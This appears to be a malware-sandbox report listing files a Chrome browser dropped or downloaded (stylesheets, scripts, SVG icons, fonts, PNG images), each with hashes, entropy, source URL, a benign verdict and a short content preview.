            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):51
            Entropy (8bit):4.297151508884876
            Encrypted:false
            SSDEEP:3:YWMmqejERpXERfJtZlCn:YWMm9gPERfJt6
            MD5:49E2BEC8E7BA486A81B1EBF711F78E3A
            SHA1:75505B06AE6DAB016FAF2EEF44826D21CB67975D
            SHA-256:F17BA6818FC73791411CAD8C126C7D7DB71B093191F8D7F775DAC5E3D1C62A69
            SHA-512:B8A28AA85465EE34717FB4908C0030A3FE3CA7BA323DBD2A6CBED8E04D6E7C53EB86F0D8BC6D45A1B18D5C12F064816E8ACC7C6A23A686B63C6F2B6CF66B978B
            Malicious:false
            Reputation:low
            Preview:{"site_domain":"arlid:746814","rate_limited":true}.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (52592)
            Category:downloaded
            Size (bytes):52789
            Entropy (8bit):5.115740062849333
            Encrypted:false
            SSDEEP:768:KkZcIOIVjl2eIWInPywe1aAvkqDX3oyq5BrieD0OTbsysV:KkZ8Pywe1aAvkqDX3oyq5BrieD0OTq
            MD5:178B651958CEFF556CBC5F355E08BBF1
            SHA1:97AFA151569F046B2E01F27C1871646E9CD87CAF
            SHA-256:8FE3FA119255ADB5E0C12479331F9E092E85BCFF56AB6ECC0510BFA2056B898D
            SHA-512:4F251A31B62B28565F41FA7EF67406384B7EBC6BB89CACCB93429A5779C589F2F72BC9FB9736FC0DAC93CCB38AD29372CF1189CC6452C3BF1EF31A89854449DD
            Malicious:false
            Reputation:low
            URL:https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css
            Preview:@charset "UTF-8";../*!. * animate.css -http://daneden.me/animate. * Version - 3.5.1. * Licensed under the MIT license - http://opensource.org/licenses/MIT. *. * Copyright (c) 2016 Daniel Eden. */...animated{-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both}.animated.infinite{-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite}.animated.hinge{-webkit-animation-duration:2s;animation-duration:2s}.animated.bounceIn,.animated.bounceOut,.animated.flipOutX,.animated.flipOutY{-webkit-animation-duration:.75s;animation-duration:.75s}@-webkit-keyframes bounce{0%,20%,53%,80%,to{-webkit-animation-timing-function:cubic-bezier(.215,.61,.355,1);animation-timing-function:cubic-bezier(.215,.61,.355,1);-webkit-transform:translateZ(0);transform:translateZ(0)}40%,43%{-webkit-transform:translate3d(0,-30px,0);transform:translate3d(0,-30px,0)}40%,43%,70%{-webkit-animation-timing-function:cubic-bezier(.755,.05,.855,.06);anima
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (11486), with CRLF line terminators
            Category:downloaded
            Size (bytes):12190
            Entropy (8bit):6.035512432273859
            Encrypted:false
            SSDEEP:192:GDjkj0moaDFJuYMQgkD5S8+cNO14KutpirtbG5XcV38a7i/Rd1Oe4irexP33kmBB:M3daDFJ5MQR5x+cNNHirtbGpcVsxJCPL
            MD5:C330CE5D9E37800914A1D67938D8D732
            SHA1:AB7D9412F48C3840E10BCA5B605577D64C2CF0AC
            SHA-256:68CA74C32F951CFC0E8B8CCDB3AE0C3792FD2187DB3B9A8B1010A5B772572022
            SHA-512:AAB10DAE829F7F804FF7767BED46871C09E39543D08E2CA0DBEC2F17DB5F3FF0CC6E43DE2CCE0ECF7D3824CB7DB143A013019067BB8A4BCA0AADE47E35822FA3
            Malicious:false
            Reputation:low
            URL:https://uzer.co/css/cookiealert.css
            Preview:/*.. * Bootstrap Cookie Alert by Wruczek.. * https://github.com/Wruczek/Bootstrap-Cookie-Alert.. * Released under MIT license.. */...cookiealert {.. position: fixed;.. bottom: 0;.. left: 0;.. width: 100%;.. margin: 0 !important;.. z-index: 999;.. opacity: 0;.. visibility: hidden;.. border-radius: 0;.. transform: translateY(100%);.. transition: all 500ms ease-out;.. color: #ecf0f1;.. background: #212327 url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEECAIAAAAd4J55AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyhpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8x
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1800 x 1432, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):1250708
            Entropy (8bit):7.995633865303328
            Encrypted:true
            SSDEEP:24576:56dO6Yki2fIfxK8WhaJOnfa+GpX6saNoqj+BwsFmRmpbs7CWnsv5fpnV:56g6sCAfhpzazaeAm8ZxBfpV
            MD5:2122F2798C316E9D9EBD8F82F709632A
            SHA1:137B4ECCA7DACA09E67ED42FEF5B56979F936D4D
            SHA-256:39A5DEF049C4A575ABA8556F82DE86C9FDC13BEB412484427E14F5A56B4E6FAF
            SHA-512:02D337CFFAEEE4083BD229FA94836345B149FEC5CD2A98DACDE42B6D457F52925046D5559F310EC26A7A5A227A60F581A5A6A19F0EFCB74834A7DB9E5D0BCA4D
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR..............j......pHYs.................sRGB.........gAMA......a....)IDATx...r.:.,F.>.\%O..'O......f...i6. ....Zk4..RcA...Z.....+.D".H$..D".H$._....).....%xF..=.}'.H[t>.O.\?......}t-..g.........x..1.o7.......g.O$.......R..X..D".H$....D....vh...m..N.....(...w5W?.......s'.....|/.sx..q..+.....=q..D.}#.>.9.o..]v.......}>...........o....n...o.....].W./u.ep?~.X.YcyNu....._?5.e..q......ZK..yf.#.....2...g.n..>q.........Z..u..m..*.}."*S.ko...?X~..............J.U.~V..g....9.2.w.s.p.......`_uN..~..^.......=>...3..n;>.W.....w#..:W...>;9;.T.m){......X.O.o.o-.......r..%.H$..D".H.Mp...-b/B.v...|..U.....T...1.q...1..q..H...48..?q..1..k...9.~..R..9C.V#......s5 ............|.>....,.mM...WD;..6^...AH.r. ..{.E..........u.....a.1........7...........<^...(..!..|<.. ."..Tc.!4v......B......wU.5..O...=.cv~..Y.U....,........T}v..\.c.T.....].... L .O5....b.....|.........c_.....Z.;=.+_r.S.|.vOF)z>.'..F.....$..D".H$........3..F.8[........{1.....g.o...\C
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1257
            Entropy (8bit):4.845241911960573
            Encrypted:false
            SSDEEP:24:2d1bqE1L6/6gxTVafAdeaxM2LiUaNgGXo0NAPJIho0NAfNIho0NAk3Ig:cVqEV6SNPUsgo
            MD5:B964C0CA91B34049D7A880BEDEF08351
            SHA1:CBCC614ED18814D304320C57AC2A714623FF5543
            SHA-256:427365A3789A7E14C09B866482793263E4512643FD351E5B46635C9C81C04688
            SHA-512:4C00C688D45337EA1EC52F64917B777028DC7BE34B648E24616F53A44BF1B24ADCB1A68A28B5C1D7DC5AE7EA18748DA7C9AC6EE7E59A99860719AB9D1C69E4D0
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/52.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="3px" height="11px" viewBox="0 0 3 11" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Icon/more</title>. <defs>. <filter color-interpolation-filters="auto" id="filter-1">. <feColorMatrix in="SourceGraphic" type="matrix" values="0 0 0 0 0.435547 0 0 0 0 0.435547 0 0 0 0 0.435547 0 0 0 1.000000 0"></feColorMatrix>. </filter>. </defs>. <g id="Symbols" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Header" transform="translate(-1312.000000, -13.000000)">. <g id="more" transform="translate(1312.000000, 13.000000)" filter="url(#filter-1)">. <g>. <ellipse id="Oval" fill="#000000" fill-rule="nonzero" cx="1.04166667" cy="1.26527565" rx="1.04166667" ry="1.26527565"></ellipse>. <ellipse id="Oval" fill="#000000" fill-rule="nonzero" cx="1.04166667" cy="5.12295191" r
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):17096
            Entropy (8bit):4.06268773612239
            Encrypted:false
            SSDEEP:384:yRIaq2IcnRr9ATrKeIYJwHe5NVMtkmvzYeC5OWLIV4lC6:yRIa2cnRr9ATW5u75N1mvzb4l9
            MD5:4E76A20309EC1E227FB24B73C1D80F62
            SHA1:4349111C3A9769B172B35FB7A5C67DF45E12680F
            SHA-256:6E538FD4830A9E6A7249EE815FDA61CC682CE78926D0B04EB1A553D708F23AAB
            SHA-512:FB51B21BE9A45EF1B8E5504B7DCB1416FC00759210AA2F1F33E422BAC14074864A56FB2C2B7C701C3C922CB06D1281D3B7348FCF9C1FAFBFE9F7C319DAEEF4B2
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/ico-digitales.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 16</title>. <defs>. <polygon id="path-1" points="0 0 27 0 27 21 0 21"></polygon>. </defs>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-608.000000, -126.000000)">. <g id="Group-13" transform="translate(86.000000, 95.000000)">. <g id="Group-16" transform="translate(522.000000, 31.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-6" transform="translate(0.000000, 8.893769)">. <g id="Group-3">. <mask id="mask-2" fill="white">. <use xlink:href="#path-1"></use
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:downloaded
            Size (bytes):2637
            Entropy (8bit):4.734213644535169
            Encrypted:false
            SSDEEP:48:kMBzaFD5H2ozCNiWuicQcsiiIuic6CVxBiTVOBh49l2GBJbWH0Fpv:+WZzPw+i9lhBWH0rv
            MD5:2C6AEED49CE509A4C2BD13B36BFCADD4
            SHA1:A8C6AB51A1FAD7F349F97ECFFDFCA822EDF983F1
            SHA-256:88DED5B4ADDF9E1F32BD8C5EE3AEB452F81DB3D637618AB7EBD53FDD6E04A6A3
            SHA-512:022B7D3E2B5DD5A3561CC01A86A1342CBA97D75401A30D93C87F1525E6C27D4CFD93581389B557AB17B2CF9CC69DB56E2F270B45516CF42DB8412CD78FEA8BD3
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/js/main-10.js
            Preview:jQuery(document).ready(function($) {....//-------------------------- STICKY MENU......var stickyOffset = $('.main-menu').offset().top;..$(window).scroll(function(){.. var sticky = $('.main-menu'),.. scroll = $(window).scrollTop();.... if (scroll >= stickyOffset) sticky.addClass('fixed');.. else sticky.removeClass('fixed');..});....//-------------------------- FUNCIONES RESPONSIVE...... var alterClass = function() {.. var ww = document.body.clientWidth;.. if (ww < 950) {.. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");.. $('.submenu-collapse').removeClass('show');.. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.... } else if (ww >= 951) {.. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");.. $('.submenu-collapse').addClass('show');.. $('.first-lvl'
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 900 x 482, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):50928
            Entropy (8bit):7.975878931160362
            Encrypted:false
            SSDEEP:1536:/JgK1VrJNPl+ddLJupYL8NuN5mGlTooJbgbrdSI:RxV7l+dJFLB7lTMb5SI
            MD5:A0DFFC137BE80ADFA3177BE319DE486F
            SHA1:6B1372FF4A0E7E4C0DE169F07862C3AD377B155B
            SHA-256:58965C22FB483CB0A51A3F143187D870B91E0AF5C837748AF3F7FF91FD450928
            SHA-512:873C0C9701500EA8E7E2002FD330016208590A49ED994629CBA03E3A85E6B7D8B8FFFD59D0C9325D9310E47E895320D13F3CA4E731BEAB5948B70649545C1359
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/lean-ux-home.png
            Preview:.PNG........IHDR..............|.U....tEXtSoftware.Adobe ImageReadyq.e<...IDATx....|T......I&!@.;.B..A..".d.DQq....j.Zm.jKU.Z.Z...j...V[...Hf.....&.....,!d..}N&..c.!d&.......q&.3..=..{.....................................................................................................................................................................................................................E0.L3.t.Hw.g}QQQMK.;{......u.k...q...;....Z..eee..g..s+\....]..P....AZ..=.PW.ht.H.X........w....r[D..gj...=...u.jaY.....~....z.F.F..J}.....r.!.@{I!...x......D.l-.z.....'...wz.O...tqM...:..X.........6...X..w.......<Q.w4.<J_.`08B..e;....;C...bR..J..W.y/.g..(....^...j.4.o-...T-.....-x....>$%%. [o...C.{@..~-..S..n/]=^........~.p.>.2..XUU.Z.z.%...B.@,.u...9-d..e...l .X.._.m1.=Cwb.....=....<....42.x..<.C...<..{...`G[.6...Z....^.ZVV.......Z.#..-**Z.....%...(....b...e..[.7j....;{.....~..y........sK......p..kVWW....W.{.......[...h..o.j.........o...n;z~III...[u....5..G..Ws..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Web Open Font Format (Version 2), TrueType, length 39808, version 1.0
            Category:downloaded
            Size (bytes):39808
            Entropy (8bit):7.995288770951227
            Encrypted:true
            SSDEEP:768:W2D7Q7LT7T/Z2bAGekMtXjshQ81go+ouJrX2dKKrDqk9k2pzlgxg7OkBGhhEHcXC:W23Q7PhmOZXjsOigoKb2dKKrDxXZlgx8
            MD5:D0B090D84204B19A1C9778774B0D7466
            SHA1:ED60E7AF89784808B7434C8B4B758C0F351F68CA
            SHA-256:212CAB2C8F18589EA483920ADEA5F5D180AB007A4140AD723D931DAE89D876E5
            SHA-512:A774C34A0DF9DAE0CC576A57CF0365352DB526315117691322FA4086BE92E0E771A48D379D8CD216F5384229F0BFBE680CDF1474F7E8557CF16DF5DC80D426C4
            Malicious:false
            Reputation:low
            URL:https://fonts.gstatic.com/s/lexend/v19/wlpwgwvFAVdoq2_v-6QU.woff2
            Preview:wOF2..............5`..............................j..~...?HVAR.!.`?STAT..'...*/~.....H.H..H.0..L.6.$.... ........[7#q....Y.u..t^NK7..%.&...@........}....YI....%.mU..~.......Y..f%.1whNtwa...8@.10fY..I..@\e...K..:ps..@H.".%....hf..F...e.....p....#....\.....A%..i.....<M.&^i...z./...S..{......]..M.tN+...j..5.....r.E`.2F.r^.Dy..W..W9..V..">rD.Uu....ldY.....K0.....ET.x.!.F.a~s|.....r.D.H2....L{(,.,.,;Y....Y.x...%.. ...............B%m..4"...^^.I..I.&.E..be......1A.3...3Lf.X.P.g.N....@.@...e.y...b..yS).E(d.F#.h.$..<.BSi_......U.J*.a....m..8x..[....E..'=.g...js#...T.O..B......?~.s..=`.`...b.%Y@d..{>....@.|.h....A.Sr..9{...d.hF.`.`......53$...v.....=....!@DI5.K..~..|...].\O..c....Rs3I..zJa..S.....) ...|'.....x4.q...)..^..z.W..C.%.RL.6..4. ..c...M;..M<F.kA..........[.... .j.es.=...v.O.9W..2.........&..>B.....o.e9&.....0.6.v...yV7[.....73w1..g0.....BN..=.....9..........B.H......J.!)..JX.. .........n.w..9....(.3....B.b.-Wn*w....E..}z...|.w..K.r....S.(.......
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with CRLF line terminators
            Category:downloaded
            Size (bytes):15659
            Entropy (8bit):4.92860570775179
            Encrypted:false
            SSDEEP:384:GGkzx9smpYTVHlzx3fGU7tzDsmpYuNyyfj7gp:GLzx9smpYTVHlzx3RsmpYuNyyfngp
            MD5:811ADB291978EBB5841226826D964E74
            SHA1:B27BB6433DCE8832E33B8F771DDCC6710EFD9716
            SHA-256:3298CE050B086D027BB23DA6E39735200725EE4EBF7E49317A14FB4F0CE5CF39
            SHA-512:F79DCD4684AD75FC1A4FBA3BD312B95EA48ACDC11C891019FA80C572B867FE38A8FF40EF42722607545CCD7079EE0D00D191D22E0D622B0B6283C890CFFFF05A
            Malicious:false
            Reputation:low
            URL:https://uzer.co/css/expandable.css
            Preview:@charset "UTF-8";..../* -------------------------------- ....Main components ....-------------------------------- */..html,..body {.. height: 100%;..}....header {.. z-index: 3;..}.....cd-nav-trigger {.. position: fixed;.. display: inline-block;..}.....cd-nav-trigger {.. top: 28px;.. right: 5%;.. height: 44px;.. width: 44px;.. z-index: 19;.. /* image replacement */.. overflow: hidden;.. text-indent: 100%;.. white-space: nowrap;.. cursor: pointer;..}.....cd-nav-trigger .cd-icon {.. /* icon created in CSS */.. position: absolute;.. left: 43%;.. top: 50%;.. bottom: auto;.. right: auto;.. -webkit-transform: translateX(-50%) translateY(-50%);.. -moz-transform: translateX(-50%) translateY(-50%);.. -ms-transform: translateX(-50%) translateY(-50%);.. -o-transform: translateX(-50%) translateY(-50%);.. transform: translateX(-50%) translateY(-50%);.. display: inline-block;.. width: 12px;.. height: 2px;.. background-color: #ffffff;.. z-index: 10;.. -webkit-transition:
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text, with very long lines (522), with CRLF line terminators
            Category:dropped
            Size (bytes):73509
            Entropy (8bit):5.228771310423195
            Encrypted:false
            SSDEEP:1536:9zT3cqXddzzFu1yNqeoNo/oWHBwag7pnx8BEDtJoo:9zRDzFYeoNo/oWHF2IK
            MD5:AAA80125DF1DAEF35FE575A07044B293
            SHA1:CF1F92060792DCF57655AD2EE100D462E1C19D2A
            SHA-256:2AFAA0458E89BBFFD65FFD0791A1F75055BDB128DAB1505843DF3C8B35B063E7
            SHA-512:9EDFF44B77BE7632A34CD622F26780BEC3F734B915C618D918B974F581104245A530E23F62AF9001C4FC09055A48929E874215630274B0AA8DC6D87801BCE0DA
            Malicious:false
            Reputation:low
            Preview:/* Modernizr 2.6.2 (Custom Build) | MIT & BSD..* Build: http://modernizr.com/download/#-csstransforms-csstransforms3d-shiv-cssclasses-prefixed-teststyles-testprop-testallprops-prefixes-domprefixes..*/..;window.Modernizr = function(a, b, c) {..function z(a) {...j.cssText = a..}..function A(a, b) {...return z(m.join(a + ";") + (b || ""))..}..function B(a, b) {...return typeof a === b..}..function C(a, b) {...return !!~("" + a).indexOf(b)..}..function D(a, b) {...for (var d in a) {....var e = a[d];....if (!C(e, "-") && j[e] !== c).....return b == "pfx" ? e : !0...}...return !1..}..function E(a, b, d) {...for (var e in a) {....var f = b[a[e]];....if (f !== c).....return d === !1 ? a[e] : B(f, "function") ? f.bind(d || b) : f...}...return !1..}..function F(a, b, c) {...var d = a.charAt(0).toUpperCase() + a.slice(1)...., e = (a + " " + o.join(d + " ") + d).split(" ");...return B(b, "string") || B(b, "undefined") ? D(e, b) : (e = (a + " " + p.join(d + " ") + d).split(" "),...E(e, b, c))..}..v
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1000 x 795, 8-bit colormap, non-interlaced
            Category:downloaded
            Size (bytes):140149
            Entropy (8bit):7.968682906491827
            Encrypted:false
            SSDEEP:3072:oSq0AbG7eQEjAeb0hivmLgpe/Y8bO/JlUkJDNi5I:xSv4h866e5biJlp0G
            MD5:5C3F3D90AA9A02A2DE51ED41FCA7AA1C
            SHA1:DC78B1317E57BD8849B61244B1C124BC9B8E3F42
            SHA-256:8352FBC4D250E2F1107C2BF3E35CFFDF360299B234435B932A92B347653A1A43
            SHA-512:7C3D2CB146573BC6CDB892C2F730E80C048DE6DFB9911FCD1D5F2D4294F5ACC1C9E2ADF035E16036C419713AD1067EDAD208CC4BF199D6B23763F58FC1C6C99E
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/port1-m.png
            Preview:.PNG........IHDR..............{Oa....PLTE.....B..9.....0..(.................C..;..=..3..A..6#$(..8..?........".....0............!#$.. ..)..,..$.....'.... !.... $..!..$.....&(*-........<&(*..-..*.!/,.0..9..!..).."..'.'=..7.%8.#4..+.03.....#.)B..............0&....!.....&..*..(..2.....6..3.....4.....6........................LAWC9L135..)......../...........'%)%.. JLP.-J2);...`ae..%ORW..."#.SUY}}.578MOS..G%.....*.....8/A)-.EFI9;=}z.........0&,*ktHmnpWc-+1&sqx..(1..>?A..HGILryZACEgflUW`xyz......27,...,7.[\]...........7..>v.8v....aw...D.....9...Xn......{..0V...>.........AJ$IN6q.,;A/es,...6y.\..LV%At......5<...1........5.k...O..e...1%.(6O#3.?M.........GS....=)V.D/.7F[{.Df..E]gw.......R..v*..]..|..... @..6c........m..i...D....^........k:...J...-^........oq..RN.....c?..Q...q.aG.s...e..w$....+...7.........tRNS.......F..... .IDATx..M..@.F.b..M...*...iK.!>...)`..._....E......./.!_0(...._n.w.uH>../.|...........T......Op.~l..........p._3....vx.:..0C..=..92.....6.&.l\.a...L"d.K5....o
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 600 x 360, 8-bit colormap, non-interlaced
            Category:dropped
            Size (bytes):41593
            Entropy (8bit):7.971721088703926
            Encrypted:false
            SSDEEP:768:VaH5s0Pmv2h4k55mhemS5KyVfXjciZuyWTo1w9d6djB8Abdd1VKV9o6sa4cTWNmj:VaH57mX/hemS5ToT39d4jB/51od4cqNa
            MD5:57DC77DB8A3CB2ECCFB06640F12BC104
            SHA1:4721167D2A228E1B941346E493F5943A634BB74B
            SHA-256:C46A430B80DCD1A2C599308E610A0AB4B7760DEC0BD2216834F4087E275ED994
            SHA-512:54D7AB839B9C75D347444E0B947AF2EFF25B4E35255BAEE13D3E916652DC9A748AFCCDBE73DD6D283F9AEA230F400EA0DD3B93EE51179FB5CA2A27F0C07D2BC4
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR...X...h......*u.....PLTE...A.........D.?...z...........@..............9.........................*........................................*.............k....."........1..........,O...u........z...9......v"M....(......;[............b2.......G)..xS.r.{....k...r....j.U= ..c.|X....oI..........sP.....xE!......i;T2 ....g@.a...@/..~3..4U.F........Y.l.j.......Nk..zK......Db........rD..[$.`.r.........{d...f9 ..._>-w....}P(..oC...f.....Xt....c|.....x.sD.kS.t.M7.cI......vi........I7..sZ....[G............5........h]wL@.a...%...U.d)c....s1.....{FK...qR.q9.P0.Z:<&.......`.R..;&..{@.`1......J...v.T5.rL....K..g.lO....#..:(.KJ.........cB.0F.w.....Lw......sc.=...t....Jdsg0.X#a.#9.haDA@^I......b.b.b[P%...S............ (.P@.-'.HL..I.....tRNS...B/(....%IDATx....0..).'.%<Z../.`Fd........)L...@.JL...X"...acd@.d...w.).?.D.B..m..{}...sr.^(..w.S...axw..)Q..1.".Qpj^.....F......X........:WN."..h^....d...'.WE.u9.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text
            Category:downloaded
            Size (bytes):3289
            Entropy (8bit):4.923485331467999
            Encrypted:false
            SSDEEP:48:HdpV4tg07ctkd3KpNLUsZ5pCl+ODPVEHwPgug:9D4OYcWdYU8axYug
            MD5:42ABDFBE42F0539732122ACA3E248595
            SHA1:0729492D4C442247450E438210F8C2A8C4279E83
            SHA-256:AB09DC864CA6D0CEC7205215F005662E8495EE6367B07FA79FF15CD104B08610
            SHA-512:9B5FA33A8AF26F1FB1F001FFE843F0C73209CBA05CC984E6D05C62172FF042CF1311774A92465B6E1E213DA1317D984871AB3B7B4BE76FA39B41D7F701250328
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/css/global.css
            Preview:..wpthemeInner, .wpthemeSecondaryNav {.. margin: 0 auto;.. width: 100%;..}..body {..font-family: 'Urbanist', sans-serif !important;..}...wptheme1Col .wpthemeCol {.. width: 100%;..}...wpthemeCol {.. margin-left: 0;..}...wpthemeLayoutContainers {.. padding: 0;..}...wpthemeControl {. margin: 0;.}....body#content {...background-color: var(--bs-body-bg) !IMPORTANT;..}..body {.. font-size: var(--bs-body-font-size) !important;.. font-weight: var(--bs-body-font-weight)!important;.. line-height: var(--bs-body-line-height)!important;.. color: var(--bs-body-color)!important;.. text-align: var(--bs-body-text-align)!important;...}.......wpthemeTopCol .wpthemeHeadlineContainer {.. width: 100%;..}....a:hover, a:focus {.. text-decoration: none !important;..}...wptheme2Col.wpthemeUnequal .wpthemeSecondaryContainer {.. width: 40%;..}.....wptheme2Col.wpthemeUnequal .wpthemePrimaryContainer {.. width: 60%;..}.....wpthemeInner .wpthemeCrumbTrail a {.. color:
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):794
            Entropy (8bit):5.11917794828243
            Encrypted:false
            SSDEEP:24:2dUnn3XxJRTH9WDhUs06wAGejnQ5+5TgzOj/WR02:cUnntH94XwAuQSg/Wf
            MD5:95B334F2497AE6927DBA9AAAAF001989
            SHA1:DEBB12709A29EBE01E9645C582E05CFA6CD1D871
            SHA-256:3C6937313996B6046D6FC011474762476571232049620732CE9AA9FB72D151AA
            SHA-512:F011E00B49A386227E9E93324391FE8D41A0632E36B56691DB3B837EC76CAB92B78E8E6A73522C73FD10EE8C3F11FF758A5ADF1AE8BC763A66FD0C81E7CE0120
            Malicious:false
            Reputation:low
